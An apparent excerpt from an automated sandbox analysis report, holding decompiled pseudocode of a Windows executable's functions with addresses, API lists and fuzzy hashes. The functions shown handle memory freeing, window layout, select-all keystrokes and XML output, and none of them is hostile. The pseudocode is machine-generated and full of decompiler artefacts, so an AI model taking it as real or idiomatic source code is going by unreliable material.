                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                  						_t25 = _t25 + 1;
                                                                                                  					} while (_t25 < _t33[0xd]);
                                                                                                  				}
                                                                                                  				_t11 =  *( *_t33)();
                                                                                                  				free( *_t11);
                                                                                                  				return _t11;
                                                                                                  			}














                                                                                                  0x004067ac
                                                                                                  0x004067af
                                                                                                  0x004067b5
                                                                                                  0x004067ba
                                                                                                  0x004067bf
                                                                                                  0x004067c1
                                                                                                  0x004067c6
                                                                                                  0x004067c7
                                                                                                  0x004067cc
                                                                                                  0x004067cd
                                                                                                  0x004067d2
                                                                                                  0x004067d4
                                                                                                  0x004067d9
                                                                                                  0x004067da
                                                                                                  0x004067df
                                                                                                  0x004067e0
                                                                                                  0x004067e5
                                                                                                  0x004067e7
                                                                                                  0x004067ec
                                                                                                  0x004067ed
                                                                                                  0x004067f2
                                                                                                  0x004067f3
                                                                                                  0x004067f8
                                                                                                  0x004067fa
                                                                                                  0x004067ff
                                                                                                  0x00406800
                                                                                                  0x00406805
                                                                                                  0x00406806
                                                                                                  0x00406808
                                                                                                  0x0040680f
                                                                                                  0x00406810
                                                                                                  0x00406812
                                                                                                  0x00406817
                                                                                                  0x0040681e
                                                                                                  0x00406828
                                                                                                  0x0040682b
                                                                                                  0x0040682c
                                                                                                  0x0040681e
                                                                                                  0x00406835
                                                                                                  0x00406839
                                                                                                  0x00406841

                                                                                                  APIs
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2241099983-0
                                                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                  				intOrPtr _v12;
                                                                                                  				struct tagPOINT _v20;
                                                                                                  				struct tagRECT _v36;
                                                                                                  				int _t27;
                                                                                                  				struct HWND__* _t30;
                                                                                                  				struct HWND__* _t32;
                                                                                                  
                                                                                                  				_t30 = _a4;
                                                                                                  				if((_a8 & 0x00000001) != 0) {
                                                                                                  					_t32 = GetParent(_t30);
                                                                                                  					GetWindowRect(_t30,  &_v20);
                                                                                                  					GetClientRect(_t32,  &_v36);
                                                                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                  					_v20.x = _t27;
                                                                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                  				}
                                                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                                                  					E00404FBB(_t30);
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}









                                                                                                  0x00405d03
                                                                                                  0x00405d06
                                                                                                  0x00405d10
                                                                                                  0x00405d17
                                                                                                  0x00405d22
                                                                                                  0x00405d32
                                                                                                  0x00405d40
                                                                                                  0x00405d48
                                                                                                  0x00405d4e
                                                                                                  0x00405d54
                                                                                                  0x00405d59
                                                                                                  0x00405d5c
                                                                                                  0x00405d61
                                                                                                  0x00405d67

                                                                                                  APIs
                                                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 4247780290-0
                                                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 89%
                                                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* _v16;
                                                                                                  				void* _t20;
                                                                                                  				void* _t21;
                                                                                                  				signed int _t28;
                                                                                                  				void* _t32;
                                                                                                  				void* _t34;
                                                                                                  
                                                                                                  				_t20 = __eax;
                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                  				_push(__ebx);
                                                                                                  				_t28 = __eax - 1;
                                                                                                  				L0040B26C();
                                                                                                  				_v16 = __eax;
                                                                                                  				if(_t28 > 0) {
                                                                                                  					_t21 = _a4;
                                                                                                  					_v8 = __ebx;
                                                                                                  					_v8 =  ~_v8;
                                                                                                  					_t32 = _t28 * __ebx + _t21;
                                                                                                  					_a4 = _t21;
                                                                                                  					do {
                                                                                                  						memcpy(_v16, _a4, __ebx);
                                                                                                  						memcpy(_a4, _t32, __ebx);
                                                                                                  						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                  						_a4 = _a4 + __ebx;
                                                                                                  						_t32 = _t32 + _v8;
                                                                                                  						_t34 = _t34 + 0x24;
                                                                                                  						_v12 = _v12 + 1;
                                                                                                  						_t28 = _t28 - 1;
                                                                                                  					} while (_t28 > _v12);
                                                                                                  				}
                                                                                                  				_push(_v16);
                                                                                                  				L0040B272();
                                                                                                  				return _t20;
                                                                                                  			}











                                                                                                  0x004083dc
                                                                                                  0x004083e2
                                                                                                  0x004083e9
                                                                                                  0x004083ea
                                                                                                  0x004083eb
                                                                                                  0x004083f3
                                                                                                  0x004083f6
                                                                                                  0x004083f8
                                                                                                  0x00408401
                                                                                                  0x00408404
                                                                                                  0x00408407
                                                                                                  0x00408409
                                                                                                  0x0040840c
                                                                                                  0x00408413
                                                                                                  0x0040841d
                                                                                                  0x00408427
                                                                                                  0x0040842c
                                                                                                  0x0040842f
                                                                                                  0x00408432
                                                                                                  0x00408435
                                                                                                  0x00408438
                                                                                                  0x00408439
                                                                                                  0x0040843e
                                                                                                  0x0040843f
                                                                                                  0x00408442
                                                                                                  0x0040844a

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$??2@??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1252195045-0
                                                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E00406746(void* __esi) {
                                                                                                  				intOrPtr _t9;
                                                                                                  				intOrPtr _t10;
                                                                                                  				intOrPtr _t11;
                                                                                                  				intOrPtr* _t18;
                                                                                                  				void* _t19;
                                                                                                  
                                                                                                  				_t19 = __esi;
                                                                                                  				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                  				if(_t9 != 0) {
                                                                                                  					_push(_t9);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                  				if(_t10 != 0) {
                                                                                                  					_push(_t10);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                  				if(_t11 != 0) {
                                                                                                  					_push(_t11);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                  				if(_t18 != 0) {
                                                                                                  					_t11 =  *_t18;
                                                                                                  					if(_t11 != 0) {
                                                                                                  						_push(_t11);
                                                                                                  						L0040B272();
                                                                                                  						 *_t18 = 0;
                                                                                                  					}
                                                                                                  					_push(_t18);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                  				return _t11;
                                                                                                  			}








                                                                                                  0x00406746
                                                                                                  0x00406746
                                                                                                  0x0040674f
                                                                                                  0x00406751
                                                                                                  0x00406752
                                                                                                  0x00406757
                                                                                                  0x00406758
                                                                                                  0x0040675d
                                                                                                  0x0040675f
                                                                                                  0x00406760
                                                                                                  0x00406765
                                                                                                  0x00406766
                                                                                                  0x0040676e
                                                                                                  0x00406770
                                                                                                  0x00406771
                                                                                                  0x00406776
                                                                                                  0x00406777
                                                                                                  0x0040677f
                                                                                                  0x00406781
                                                                                                  0x00406785
                                                                                                  0x00406787
                                                                                                  0x00406788
                                                                                                  0x0040678e
                                                                                                  0x0040678e
                                                                                                  0x00406790
                                                                                                  0x00406791
                                                                                                  0x00406796
                                                                                                  0x00406798
                                                                                                  0x0040679e
                                                                                                  0x004067a1
                                                                                                  0x004067a4
                                                                                                  0x004067ab

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 87%
                                                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                  				struct HDWP__* _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				void* __ebx;
                                                                                                  				intOrPtr _t37;
                                                                                                  				intOrPtr _t42;
                                                                                                  				RECT* _t44;
                                                                                                  
                                                                                                  				_push(__ecx);
                                                                                                  				_push(__ecx);
                                                                                                  				_t42 = __ecx;
                                                                                                  				_v12 = __ecx;
                                                                                                  				if(_a4 != 5) {
                                                                                                  					if(_a4 != 0xf) {
                                                                                                  						if(_a4 == 0x24) {
                                                                                                  							_t37 = _a12;
                                                                                                  							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                  							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						E00402EC8(__ecx + 0x378);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v8 = BeginDeferWindowPos(3);
                                                                                                  					_t44 = _t42 + 0x378;
                                                                                                  					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                  					EndDeferWindowPos(_v8);
                                                                                                  					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                  					_t42 = _v12;
                                                                                                  				}
                                                                                                  				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                  			}









                                                                                                  0x0040aba8
                                                                                                  0x0040aba9
                                                                                                  0x0040abb0
                                                                                                  0x0040abb2
                                                                                                  0x0040abb5
                                                                                                  0x0040ac19
                                                                                                  0x0040ac2c
                                                                                                  0x0040ac2e
                                                                                                  0x0040ac36
                                                                                                  0x0040ac39
                                                                                                  0x0040ac39
                                                                                                  0x0040ac1b
                                                                                                  0x0040ac21
                                                                                                  0x0040ac21
                                                                                                  0x0040abb7
                                                                                                  0x0040abcb
                                                                                                  0x0040abce
                                                                                                  0x0040abd7
                                                                                                  0x0040abe6
                                                                                                  0x0040abf6
                                                                                                  0x0040abfe
                                                                                                  0x0040ac09
                                                                                                  0x0040ac0f
                                                                                                  0x0040ac12
                                                                                                  0x0040ac4f

                                                                                                  APIs
                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                  • String ID: $
                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                  				int _t14;
                                                                                                  
                                                                                                  				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                  					GetKeyState(0xa2);
                                                                                                  					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                  						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                  							_t14 = E00403A60(0xa5);
                                                                                                  							if(_t14 == 0) {
                                                                                                  								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                  			}




                                                                                                  0x00403a7d
                                                                                                  0x00403a8c
                                                                                                  0x00403a9c
                                                                                                  0x00403aba
                                                                                                  0x00403adf
                                                                                                  0x00403ae7
                                                                                                  0x00403af4
                                                                                                  0x00403af4
                                                                                                  0x00403ae7
                                                                                                  0x00403aba
                                                                                                  0x00403a9c
                                                                                                  0x00403b13

                                                                                                  APIs
                                                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: State$CallMessageProcSendWindow
                                                                                                  • String ID: A
                                                                                                  • API String ID: 3924021322-3554254475
                                                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 91%
                                                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                  				intOrPtr _v20;
                                                                                                  				char _v1072;
                                                                                                  				void _v3672;
                                                                                                  				char _v4496;
                                                                                                  				intOrPtr _v4556;
                                                                                                  				char _v4560;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t41;
                                                                                                  				void* _t45;
                                                                                                  
                                                                                                  				_t45 = __eflags;
                                                                                                  				E0040B550(0x11cc, __ecx);
                                                                                                  				E00402923( &_v4560);
                                                                                                  				_v4560 = 0x40db44;
                                                                                                  				E00406670( &_v4496, _t45);
                                                                                                  				_v4496 = 0x40dab0;
                                                                                                  				memset( &_v3672, 0, 0x10);
                                                                                                  				E0040A909( &_v1072);
                                                                                                  				_t41 = _a4;
                                                                                                  				_v4556 = 0x71;
                                                                                                  				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                  					L0040B266();
                                                                                                  					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                  				}
                                                                                                  				_v4496 = 0x40dab0;
                                                                                                  				_v4560 = 0x40db44;
                                                                                                  				E004067AC( &_v4496);
                                                                                                  				return E00402940( &_v4560);
                                                                                                  			}













                                                                                                  0x004034f0
                                                                                                  0x004034f8
                                                                                                  0x00403506
                                                                                                  0x00403516
                                                                                                  0x0040351c
                                                                                                  0x00403531
                                                                                                  0x00403537
                                                                                                  0x00403545
                                                                                                  0x0040354a
                                                                                                  0x00403556
                                                                                                  0x00403567
                                                                                                  0x00403575
                                                                                                  0x00403583
                                                                                                  0x00403583
                                                                                                  0x00403586
                                                                                                  0x00403592
                                                                                                  0x00403598
                                                                                                  0x004035ac

                                                                                                  APIs
                                                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                  • memset.MSVCRT ref: 00403537
                                                                                                  • _ultow.MSVCRT ref: 00403575
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset$_ultow
                                                                                                  • String ID: cf@$q
                                                                                                  • API String ID: 3448780718-2693627795
                                                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                  				void _v514;
                                                                                                  				signed short _v516;
                                                                                                  				void _v1026;
                                                                                                  				signed short _v1028;
                                                                                                  				void* __esi;
                                                                                                  				void* _t17;
                                                                                                  				intOrPtr* _t26;
                                                                                                  				signed short* _t28;
                                                                                                  
                                                                                                  				_v516 = _v516 & 0x00000000;
                                                                                                  				_t26 = __ecx;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				_v1028 = _v1028 & 0x00000000;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                  				_t28 =  &_v516;
                                                                                                  				E00407250(_t28, _t17);
                                                                                                  				_push(_t28);
                                                                                                  				_push(L"</%s>\r\n");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v1028);
                                                                                                  				L0040B1EC();
                                                                                                  				return E00407343(_t26, _a4,  &_v1028);
                                                                                                  			}











                                                                                                  0x00407e2d
                                                                                                  0x00407e46
                                                                                                  0x00407e48
                                                                                                  0x00407e4d
                                                                                                  0x00407e5f
                                                                                                  0x00407e6b
                                                                                                  0x00407e6f
                                                                                                  0x00407e75
                                                                                                  0x00407e7c
                                                                                                  0x00407e7d
                                                                                                  0x00407e88
                                                                                                  0x00407e8d
                                                                                                  0x00407e8e
                                                                                                  0x00407eaa

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00407E48
                                                                                                  • memset.MSVCRT ref: 00407E5F
                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                  • String ID: </%s>
                                                                                                  • API String ID: 3400436232-259020660
                                                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				void _v8198;
                                                                                                  				short _v8200;
                                                                                                  				void* _t9;
                                                                                                  				void* _t12;
                                                                                                  				intOrPtr _t19;
                                                                                                  				intOrPtr _t20;
                                                                                                  
                                                                                                  				_t19 = __ecx;
                                                                                                  				_t9 = E0040B550(0x2004, __ecx);
                                                                                                  				_t20 = _t19;
                                                                                                  				if(_t20 == 0) {
                                                                                                  					_t20 =  *0x40fe24; // 0x0
                                                                                                  				}
                                                                                                  				_t25 =  *0x40fb90;
                                                                                                  				if( *0x40fb90 != 0) {
                                                                                                  					_v8200 = _v8200 & 0x00000000;
                                                                                                  					memset( &_v8198, 0, 0x2000);
                                                                                                  					_push(_t20);
                                                                                                  					_t12 = 5;
                                                                                                  					E00405E8D(_t12);
                                                                                                  					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                  						SetWindowTextW(_a4,  &_v8200);
                                                                                                  					}
                                                                                                  					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                  				}
                                                                                                  				return _t9;
                                                                                                  			}









                                                                                                  0x00405e0a
                                                                                                  0x00405e12
                                                                                                  0x00405e18
                                                                                                  0x00405e1c
                                                                                                  0x00405e1e
                                                                                                  0x00405e1e
                                                                                                  0x00405e24
                                                                                                  0x00405e2c
                                                                                                  0x00405e2e
                                                                                                  0x00405e44
                                                                                                  0x00405e49
                                                                                                  0x00405e4c
                                                                                                  0x00405e4d
                                                                                                  0x00405e68
                                                                                                  0x00405e74
                                                                                                  0x00405e74
                                                                                                  0x00000000
                                                                                                  0x00405e84
                                                                                                  0x00405e8c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
